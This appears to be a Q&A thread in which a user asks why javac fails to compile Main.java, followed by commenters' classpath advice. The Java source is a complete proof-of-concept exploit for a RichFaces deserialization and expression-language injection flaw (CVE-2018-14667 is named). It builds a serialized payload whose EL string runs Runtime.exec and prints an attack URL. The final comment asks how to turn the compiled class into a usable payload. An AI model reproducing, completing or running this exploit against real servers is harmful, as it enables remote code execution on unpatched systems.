# Issues when running javac Main.java

Tags: compilation, java, jboss

I am currently trying to run 'javac Main.java' from the source below:

```
import com.sun.facelets.el.TagMethodExpression;
import com.sun.facelets.el.TagValueExpression;
import com.sun.facelets.tag.Location;
import com.sun.facelets.tag.TagAttribute;
import org.ajax4jsf.resource.UserResource;
import org.ajax4jsf.util.base64.URL64Codec;
import org.jboss.el.MethodExpressionImpl;
import org.jboss.el.ValueExpressionImpl;
import org.jboss.el.parser.*;
import org.jboss.seam.core.Expressions;
import org.richfaces.ui.application.StateMethodExpressionWrapper;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.Date;
import java.util.zip.Deflater;
import javax.el.MethodExpression;
import javax.faces.context.FacesContext;

public  class  Main  {

    public static void main(String[] args) throws Exception{

        String pocEL = "#{request.getClass().getClassLoader().loadClass(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null).exec(\"touch /tmp/aaaaa\")}";
        // tomcat8.5.24 MethodExpression serialVersionUID
        Long MethodExpressionSerialVersionUID = 8163925562047324656L;
        Class clazz = Class.forName("javax.el.MethodExpression");
        Field field = clazz.getField("serialVersionUID");
        field.setAccessible(true);
        Field modifiersField = Field.class.getDeclaredField("modifiers");
        modifiersField.setAccessible(true);
        modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL);
        field.setLong(null, MethodExpressionSerialVersionUID);




        // createContent
        MethodExpressionImpl mei = new MethodExpressionImpl(pocEL, null, null, null, null, new Class[]{OutputStream.class, Object.class});
        ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
        StateMethodExpressionWrapper smew = new StateMethodExpressionWrapper(mei, vei);
        Location location = new Location("/richfaces/mediaOutput/examples/jpegSample.xhtml", 0, 0);
        TagAttribute tagAttribute = new TagAttribute(location, "", "", "@11214", "createContent="+pocEL);
        TagMethodExpression tagMethodExpression = new TagMethodExpression(tagAttribute, smew);

        Class cls = Class.forName("javax.faces.component.StateHolderSaver");
        Constructor ct = cls.getDeclaredConstructor(FacesContext.class, Object.class);
        ct.setAccessible(true);
        Object createContnet = ct.newInstance(null, tagMethodExpression);

        //value
        Object value = "haveTest";

        //modified
        TagAttribute tag = new TagAttribute(location, "", "", "just", "modified="+pocEL);
        ValueExpressionImpl ve = new ValueExpressionImpl(pocEL+" modified", null, null, null, Date.class);
        TagValueExpression tagValueExpression = new TagValueExpression(tag, ve);
        Object modified = ct.newInstance(null, tagValueExpression);

        //expires
        TagAttribute tag2 = new TagAttribute(location, "", "", "have_fun", "expires="+pocEL);
        ValueExpressionImpl ve2 = new ValueExpressionImpl(pocEL+" expires", null, null, null, Date.class);
        TagValueExpression tagValueExpression2 = new TagValueExpression(tag2, ve2);
        Object expires = ct.newInstance(null, tagValueExpression2);

        //payload object
        UserResource.UriData uriData = new UserResource.UriData();
        //Constructor con = UserResource.class.getConstructor(new Class[]{});
        Field fieldCreateContent = uriData.getClass().getDeclaredField("createContent");
        fieldCreateContent.setAccessible(true);
        fieldCreateContent.set(uriData, createContnet);
        Field fieldValue = uriData.getClass().getDeclaredField("value");
        fieldValue.setAccessible(true);
        fieldValue.set(uriData, value);
        Field fieldModefied = uriData.getClass().getDeclaredField("modified");
        fieldModefied.setAccessible(true);
        fieldModefied.set(uriData, modified);
        Field fieldExpires = uriData.getClass().getDeclaredField("expires");
        fieldExpires.setAccessible(true);
        fieldExpires.set(uriData, expires);


        //encrypt
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(uriData);
        objectOutputStream.flush();
        objectOutputStream.close();
        byteArrayOutputStream.close();
        byte[] pocData = byteArrayOutputStream.toByteArray();
        Deflater compressor = new Deflater(1);
        byte[] compressed = new byte[pocData.length + 100];
        compressor.setInput(pocData);
        compressor.finish();
        int totalOut = compressor.deflate(compressed);
        byte[] zipsrc = new byte[totalOut];
        System.arraycopy(compressed, 0, zipsrc, 0, totalOut);
        compressor.end();
        byte[] dataArray = URL64Codec.encodeBase64(zipsrc);

        String poc = "/DATA/" + new String(dataArray, "ISO-8859-1") + ".jsf";
        System.out.println(poc);
    }
}
```

but everytime I receive the following error message:

```
Main.java:1: error: package com.sun.facelets.el does not exist
import com.sun.facelets.el.TagMethodExpression;
                          ^
Main.java:2: error: package com.sun.facelets.el does not exist
import com.sun.facelets.el.TagValueExpression;
                          ^
Main.java:3: error: package com.sun.facelets.tag does not exist
import com.sun.facelets.tag.Location;
                           ^
Main.java:4: error: package com.sun.facelets.tag does not exist
import com.sun.facelets.tag.TagAttribute;
                           ^
Main.java:5: error: package org.ajax4jsf.resource does not exist
import org.ajax4jsf.resource.UserResource;
                            ^
Main.java:6: error: package org.ajax4jsf.util.base64 does not exist
import org.ajax4jsf.util.base64.URL64Codec;
                               ^
Main.java:7: error: package org.jboss.el does not exist
import org.jboss.el.MethodExpressionImpl;
                   ^
Main.java:8: error: package org.jboss.el does not exist
import org.jboss.el.ValueExpressionImpl;
                   ^
Main.java:9: error: package org.jboss.el.parser does not exist
import org.jboss.el.parser.*;
^
Main.java:10: error: package org.jboss.seam.core does not exist
import org.jboss.seam.core.Expressions;
                          ^
Main.java:11: error: package org.richfaces.ui.application does not exist
import org.richfaces.ui.application.StateMethodExpressionWrapper;
                                   ^
Main.java:21: error: package javax.el does not exist
import javax.el.MethodExpression;
               ^
Main.java:22: error: package javax.faces.context does not exist
import javax.faces.context.FacesContext;
                          ^
Main.java:43: error: cannot find symbol
        MethodExpressionImpl mei = new MethodExpressionImpl(pocEL, null, null, null, null, new Class[]{OutputStream.class, Object.class});
        ^
  symbol:   class MethodExpressionImpl
  location: class Main
Main.java:43: error: cannot find symbol
        MethodExpressionImpl mei = new MethodExpressionImpl(pocEL, null, null, null, null, new Class[]{OutputStream.class, Object.class});
                                       ^
  symbol:   class MethodExpressionImpl
  location: class Main
Main.java:44: error: cannot find symbol
        ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
        ^
  symbol:   class ValueExpressionImpl
  location: class Main
Main.java:44: error: cannot find symbol
        ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
                                      ^
  symbol:   class ValueExpressionImpl
  location: class Main
Main.java:44: error: cannot find symbol
        ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
                                                                                   ^
  symbol:   class MethodExpression
  location: class Main
Main.java:45: error: cannot find symbol
        StateMethodExpressionWrapper smew = new StateMethodExpressionWrapper(mei, vei);
        ^
  symbol:   class StateMethodExpressionWrapper
  location: class Main
Main.java:45: error: cannot find symbol
        StateMethodExpressionWrapper smew = new StateMethodExpressionWrapper(mei, vei);
                                                ^
  symbol:   class StateMethodExpressionWrapper
  location: class Main
Main.java:46: error: cannot find symbol
        Location location = new Location("/richfaces/mediaOutput/examples/jpegSample.xhtml", 0, 0);
        ^
  symbol:   class Location
  location: class Main
Main.java:46: error: cannot find symbol
        Location location = new Location("/richfaces/mediaOutput/examples/jpegSample.xhtml", 0, 0);
                                ^
  symbol:   class Location
  location: class Main
Main.java:47: error: cannot find symbol
        TagAttribute tagAttribute = new TagAttribute(location, "", "", "@11214", "createContent="+pocEL);
        ^
  symbol:   class TagAttribute
  location: class Main
Main.java:47: error: cannot find symbol
        TagAttribute tagAttribute = new TagAttribute(location, "", "", "@11214", "createContent="+pocEL);
                                        ^
  symbol:   class TagAttribute
  location: class Main
Main.java:48: error: cannot find symbol
        TagMethodExpression tagMethodExpression = new TagMethodExpression(tagAttribute, smew);
        ^
  symbol:   class TagMethodExpression
  location: class Main
Main.java:48: error: cannot find symbol
        TagMethodExpression tagMethodExpression = new TagMethodExpression(tagAttribute, smew);
                                                      ^
  symbol:   class TagMethodExpression
  location: class Main
Main.java:51: error: cannot find symbol
        Constructor ct = cls.getDeclaredConstructor(FacesContext.class, Object.class);
                                                    ^
  symbol:   class FacesContext
  location: class Main
Main.java:59: error: cannot find symbol
        TagAttribute tag = new TagAttribute(location, "", "", "just", "modified="+pocEL);
        ^
  symbol:   class TagAttribute
  location: class Main
Main.java:59: error: cannot find symbol
        TagAttribute tag = new TagAttribute(location, "", "", "just", "modified="+pocEL);
                               ^
  symbol:   class TagAttribute
  location: class Main
Main.java:60: error: cannot find symbol
        ValueExpressionImpl ve = new ValueExpressionImpl(pocEL+" modified", null, null, null, Date.class);
        ^
  symbol:   class ValueExpressionImpl
  location: class Main
Main.java:60: error: cannot find symbol
        ValueExpressionImpl ve = new ValueExpressionImpl(pocEL+" modified", null, null, null, Date.class);
                                     ^
  symbol:   class ValueExpressionImpl
  location: class Main
Main.java:61: error: cannot find symbol
        TagValueExpression tagValueExpression = new TagValueExpression(tag, ve);
        ^
  symbol:   class TagValueExpression
  location: class Main
Main.java:61: error: cannot find symbol
        TagValueExpression tagValueExpression = new TagValueExpression(tag, ve);
                                                    ^
  symbol:   class TagValueExpression
  location: class Main
Main.java:65: error: cannot find symbol
        TagAttribute tag2 = new TagAttribute(location, "", "", "have_fun", "expires="+pocEL);
        ^
  symbol:   class TagAttribute
  location: class Main
Main.java:65: error: cannot find symbol
        TagAttribute tag2 = new TagAttribute(location, "", "", "have_fun", "expires="+pocEL);
                                ^
  symbol:   class TagAttribute
  location: class Main
Main.java:66: error: cannot find symbol
        ValueExpressionImpl ve2 = new ValueExpressionImpl(pocEL+" expires", null, null, null, Date.class);
        ^
  symbol:   class ValueExpressionImpl
  location: class Main
Main.java:66: error: cannot find symbol
        ValueExpressionImpl ve2 = new ValueExpressionImpl(pocEL+" expires", null, null, null, Date.class);
                                      ^
  symbol:   class ValueExpressionImpl
  location: class Main
Main.java:67: error: cannot find symbol
        TagValueExpression tagValueExpression2 = new TagValueExpression(tag2, ve2);
        ^
  symbol:   class TagValueExpression
  location: class Main
Main.java:67: error: cannot find symbol
        TagValueExpression tagValueExpression2 = new TagValueExpression(tag2, ve2);
                                                     ^
  symbol:   class TagValueExpression
  location: class Main
Main.java:71: error: package UserResource does not exist
        UserResource.UriData uriData = new UserResource.UriData();
                    ^
Main.java:71: error: package UserResource does not exist
        UserResource.UriData uriData = new UserResource.UriData();
                                                       ^
Main.java:103: error: cannot find symbol
        byte[] dataArray = URL64Codec.encodeBase64(zipsrc);
                           ^
  symbol:   variable URL64Codec
  location: class Main
42 errors
```

Comment: In your imports list, anything that isn't `import java.<blah>` are likely to be third-party libraries that doesn't come built-in. You will need to tell the compiler where to find them. You'll need to find in your computer where all the missing packages (`jboss`, `ajax4sf`, etc) are. [This may help you understand java classpaths and how to feed them to the compiler](https://docs.oracle.com/javase/7/docs/technotes/tools/windows/classpath.html#Understanding).

Comment: This would explain all those error message. Now, based on the location of jboss (/opt/jboss5.1.0GA) the correct syntax would be:
'javac -classpath /opt/jboss5.1.0GA/ Main.java' please let me know if i am missing something here, thanks

Comment: Read that link. You need to use `-classpath`; they have examples of including multiple .jar files, a whole directory with wildcards, and others.

Comment: I downloaded https://github.com/zeroto01/CVE-2018-14667/blob/master/richfaces-demo-3.3.0.GA-tomcat6.war to have all the libs required, then 'jar xvf the-war-file'. I've put my Main.java inside WEB-INF/lib/. I tried running java -classpath /home/user/WEB-INF/lib/* Main.java then received this msg: Error: Could not find or load main class .home.user.WEB-INF.lib.antlr-3.0.jar

Comment: You likely need quotes in your classpath `javac -cp "something/lib/*" Main.java` If you then run into an error about missing reference to `javax.el`, [see if this helps](https://stackoverflow.com/a/2158514/5623232).

Comment: allright! I went from 42 errrors, then down to 2 errors now with:

javac -cp "/home/user/jboss/WEB-INF/lib/*" Main.java

Main.java:21: error: package javax.el does not exist
import javax.el.MethodExpression;
               ^
Main.java:42: error: cannot find symbol
        ValueExpressionImpl vei = new ValueExpressionImpl(pocEL, null, null, null, MethodExpression.class);
                                                                                   ^
  symbol:   class MethodExpression
  location: class Main

Comment: Finally, I have been able to compile it. I now have my 'Main.class' file. Now, I am wondering how I can convert the Main.class file (which is the payload) into a payload similar to the payload mention in https://github.com/zeroto01/CVE-2018-14667/